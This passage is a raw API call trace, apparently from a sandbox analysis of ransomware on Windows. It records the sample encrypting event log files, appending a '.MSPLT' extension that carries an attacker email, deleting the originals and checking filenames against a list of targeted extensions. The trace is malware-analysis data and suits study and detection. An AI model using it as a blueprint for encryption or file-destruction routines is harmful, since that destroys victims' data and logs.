ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0295.145] WriteFile (in: hFile=0x46c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x128, lpOverlapped=0x0) returned 1 [0295.146] SetEndOfFile (hFile=0x46c) returned 1 [0295.146] CloseHandle (hObject=0x46c) returned 1 [0295.153] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.153] SetEndOfFile (hFile=0x488) returned 1 [0295.154] CloseHandle (hObject=0x488) returned 1 [0295.154] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.155] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 1 [0295.155] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.155] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.155] lstrlenW (lpString=".doc") returned 4 [0295.155] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.155] lstrlenW (lpString=".docx") returned 5 [0295.155] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.155] lstrlenW (lpString=".pdf") returned 4 [0295.155] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.155] lstrlenW (lpString=".xls") returned 4 [0295.156] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString=".xlsx") returned 5 [0295.156] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.156] lstrlenW (lpString=".ppt") returned 4 [0295.156] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.156] lstrlenW (lpString=".zip") returned 4 [0295.156] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString=".rar") returned 4 [0295.156] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString=".bz2") returned 4 [0295.156] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString=".7z") returned 3 [0295.156] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.156] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.156] lstrlenW (lpString=".dbf") returned 4 [0295.156] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.156] lstrlenW (lpString=".1cd") returned 4 [0295.156] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.156] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.156] lstrlenW (lpString=".jpg") returned 4 [0295.156] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.157] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.157] lstrlenW (lpString=".doc") returned 4 [0295.157] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".docx") returned 5 [0295.157] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.157] lstrlenW (lpString=".pdf") returned 4 [0295.157] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".xls") returned 4 [0295.157] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".xlsx") returned 5 [0295.157] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.157] lstrlenW (lpString=".ppt") returned 4 [0295.157] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.157] lstrlenW (lpString=".zip") returned 4 [0295.157] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".rar") returned 4 [0295.157] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".bz2") returned 4 [0295.157] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.157] lstrlenW (lpString=".7z") returned 3 [0295.157] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.157] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.157] lstrlenW (lpString=".dbf") returned 4 [0295.157] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.158] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.158] lstrlenW (lpString=".1cd") returned 4 [0295.158] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.158] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0295.158] lstrlenW (lpString=".jpg") returned 4 [0295.158] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.158] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.158] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 72 [0295.158] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0295.244] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=1052672) returned 1 [0295.244] CloseHandle (hObject=0x440) returned 1 [0295.251] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 0x20 [0295.251] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.251] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0295.251] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.251] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.251] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0295.252] GetLastError () returned 0x0 [0295.252] ReadFile (in: hFile=0x440, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0295.618] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0295.644] ReadFile (in: hFile=0x440, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x1010, lpOverlapped=0x0) returned 1 [0296.041] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1020, lpOverlapped=0x0) returned 1 [0296.045] ReadFile (in: hFile=0x440, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0296.046] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x164, lpOverlapped=0x0) returned 1 [0296.046] SetEndOfFile (hFile=0x42c) returned 1 [0296.046] CloseHandle (hObject=0x42c) returned 1 [0296.462] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.462] SetEndOfFile (hFile=0x440) returned 1 [0296.463] CloseHandle (hObject=0x440) returned 1 [0296.464] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0296.464] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 1 [0296.464] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.464] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.464] lstrlenW (lpString=".doc") returned 4 [0296.465] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".docx") returned 5 [0296.465] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.465] lstrlenW (lpString=".pdf") returned 4 [0296.465] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".xls") returned 4 [0296.465] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".xlsx") returned 5 [0296.465] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.465] lstrlenW (lpString=".ppt") returned 4 [0296.465] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.465] lstrlenW (lpString=".zip") returned 4 [0296.465] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".rar") returned 4 [0296.465] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".bz2") returned 4 [0296.465] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString=".7z") returned 3 [0296.465] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.465] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.465] lstrlenW (lpString=".dbf") returned 4 [0296.465] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.465] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.465] lstrlenW (lpString=".1cd") returned 4 [0296.465] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.466] lstrlenW (lpString=".jpg") returned 4 [0296.466] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.466] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.466] lstrlenW (lpString=".doc") returned 4 [0296.466] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".docx") returned 5 [0296.466] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.466] lstrlenW (lpString=".pdf") returned 4 [0296.466] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".xls") returned 4 [0296.466] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".xlsx") returned 5 [0296.466] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.466] lstrlenW (lpString=".ppt") returned 4 [0296.466] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.466] lstrlenW (lpString=".zip") returned 4 [0296.466] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".rar") returned 4 [0296.466] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".bz2") returned 4 [0296.466] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.466] lstrlenW (lpString=".7z") returned 3 [0296.466] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.467] lstrlenW (lpString=".dbf") returned 4 [0296.467] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.467] lstrlenW (lpString=".1cd") returned 4 [0296.467] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0296.467] lstrlenW (lpString=".jpg") returned 4 [0296.467] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.467] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0296.467] lstrlenW (lpString="Windows PowerShell.evtx") returned 23 [0296.467] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0296.468] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0296.468] CloseHandle (hObject=0x440) returned 1 [0296.468] GetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 0x20 [0296.468] GetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\windows powershell.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.468] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0296.468] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.468] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.468] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\windows powershell.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0296.469] GetLastError () returned 0x0 [0296.469] ReadFile (in: hFile=0x440, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0296.474] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0296.477] ReadFile (in: hFile=0x440, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0296.477] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x102, lpOverlapped=0x0) returned 1 [0296.478] SetEndOfFile (hFile=0x42c) returned 1 [0296.478] CloseHandle (hObject=0x42c) returned 1 [0296.488] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.488] SetEndOfFile (hFile=0x440) returned 1 [0296.490] CloseHandle (hObject=0x440) returned 1 [0296.490] SetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0296.491] DeleteFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 1 [0296.491] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.491] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.491] lstrlenW (lpString=".doc") returned 4 [0296.491] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.491] lstrlenW (lpString=".docx") returned 5 [0296.491] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.491] lstrlenW (lpString=".pdf") returned 4 [0296.491] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.491] lstrlenW (lpString=".xls") returned 4 [0296.491] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.491] lstrlenW (lpString=".xlsx") returned 5 [0296.491] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.492] lstrlenW (lpString=".ppt") returned 4 [0296.492] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.492] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.492] lstrlenW (lpString=".zip") returned 4 [0296.492] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.492] lstrlenW (lpString=".rar") returned 4 [0296.492] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.492] lstrlenW (lpString=".bz2") returned 4 [0296.492] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.492] lstrlenW (lpString=".7z") returned 3 [0296.492] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.492] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.492] lstrlenW (lpString=".dbf") returned 4 [0296.492] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.492] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.492] lstrlenW (lpString=".1cd") returned 4 [0296.492] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.493] lstrlenW (lpString=".jpg") returned 4 [0296.493] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.493] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.493] lstrlenW (lpString=".doc") returned 4 [0296.493] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString=".docx") returned 5 [0296.493] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.493] lstrlenW (lpString=".pdf") returned 4 [0296.493] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString=".xls") returned 4 [0296.493] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString=".xlsx") returned 5 [0296.493] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.493] lstrlenW (lpString=".ppt") returned 4 [0296.493] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.493] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.493] lstrlenW (lpString=".zip") returned 4 [0296.494] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.494] lstrlenW (lpString=".rar") returned 4 [0296.494] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.494] lstrlenW (lpString=".bz2") returned 4 [0296.494] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.494] lstrlenW (lpString=".7z") returned 3 [0296.494] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.494] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.494] lstrlenW (lpString=".dbf") returned 4 [0296.494] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.494] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.494] lstrlenW (lpString=".1cd") returned 4 [0296.494] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.494] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0296.494] lstrlenW (lpString=".jpg") returned 4 [0296.494] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.494] lstrcmpiW (lpString1=".sys", lpString2=".MSPLT") returned 1 [0296.494] lstrlenW (lpString="pagefile.sys") returned 12 [0296.494] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.495] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.495] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.495] lstrlenW (lpString=".doc") returned 4 [0296.495] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0296.495] lstrlenW (lpString=".docx") returned 5 [0296.495] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0296.495] lstrlenW (lpString=".pdf") returned 4 [0296.495] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0296.495] lstrlenW (lpString=".xls") returned 4 [0296.495] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0296.495] lstrlenW (lpString=".xlsx") returned 5 [0296.495] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0296.495] lstrlenW (lpString=".ppt") returned 4 [0296.495] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0296.495] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.495] lstrlenW (lpString=".zip") returned 4 [0296.496] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0296.496] lstrlenW (lpString=".rar") returned 4 [0296.496] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString=".bz2") returned 4 [0296.496] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString=".7z") returned 3 [0296.496] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0296.496] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.496] lstrlenW (lpString=".dbf") returned 4 [0296.496] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.496] lstrlenW (lpString=".1cd") returned 4 [0296.496] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.496] lstrlenW (lpString=".jpg") returned 4 [0296.496] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.496] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.496] lstrlenW (lpString=".doc") returned 4 [0296.496] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString=".docx") returned 5 [0296.496] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0296.496] lstrlenW (lpString=".pdf") returned 4 [0296.496] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0296.496] lstrlenW (lpString=".xls") returned 4 [0296.497] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0296.497] lstrlenW (lpString=".xlsx") returned 5 [0296.497] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0296.497] lstrlenW (lpString=".ppt") returned 4 [0296.497] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0296.497] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.497] lstrlenW (lpString=".zip") returned 4 [0296.497] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0296.497] lstrlenW (lpString=".rar") returned 4 [0296.497] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0296.497] lstrlenW (lpString=".bz2") returned 4 [0296.497] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0296.497] lstrlenW (lpString=".7z") returned 3 [0296.497] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0296.497] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.497] lstrlenW (lpString=".dbf") returned 4 [0296.497] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0296.497] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.497] lstrlenW (lpString=".1cd") returned 4 [0296.497] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0296.497] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0296.497] lstrlenW (lpString=".jpg") returned 4 [0296.497] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0296.498] lstrcmpiW (lpString1=".OLB", lpString2=".MSPLT") returned 1 [0296.498] lstrlenW (lpString="MSADDNDR.OLB") returned 12 [0296.498] CreateFileW (lpFileName="C:\\Program Files\\Common 